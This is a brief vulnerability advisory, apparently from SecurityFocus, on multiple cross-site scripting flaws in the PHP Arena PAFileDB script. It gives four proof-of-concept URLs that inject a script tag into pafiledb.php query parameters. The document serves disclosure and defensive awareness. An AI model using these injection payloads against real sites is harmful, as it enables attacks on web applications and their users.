PHP Arena PAFileDB Multiple Remote Cross Site Scripting Vulnerabilities

No exploits are required to leverage these issues. The following proof of concepts have been made available:

http://www.example.com/pafiledb.php?"><script>alert();</script>
http://www.example.com/pafiledb.php?action="><script>alert();</script>
http://www.example.com/pafiledb.php?[something]="><script>alert();</script>
http://www.example.com/pafiledb.php?[something]=&[something]="><script>alert();</script>


 

Privacy Statement
Copyright 2010, SecurityFocus